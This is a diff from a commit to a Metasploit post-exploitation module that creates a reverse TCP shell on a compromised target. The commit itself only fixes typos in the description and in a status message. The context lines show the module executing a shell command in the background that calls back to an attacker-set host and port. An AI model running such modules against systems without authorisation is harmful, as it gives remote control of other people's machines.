Tweaky bits.
This commit is contained in:
@@ -9,8 +9,8 @@ class MetasploitModule < Msf::Post
|
||||
super( update_info( info,
|
||||
'Name' => 'Multi Manage System Remote TCP Shell Session',
|
||||
'Description' => %q{
|
||||
This module will create a Reverse TCP Shell on the target system's
|
||||
using the system own scripting environments installed on the
|
||||
This module will create a Reverse TCP Shell on the target system
|
||||
using the system's own scripting environments installed on the
|
||||
target.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Post
|
||||
end
|
||||
|
||||
if not cmd.empty?
|
||||
print_status("Executing reverse tcp shel to #{lhost} on port #{lport}")
|
||||
print_status("Executing reverse tcp shell to #{lhost} on port #{lport}")
|
||||
cmd_exec("(#{cmd} &)")
|
||||
end
|
||||
end
|
||||
|
||||
Reference in New Issue
Block a user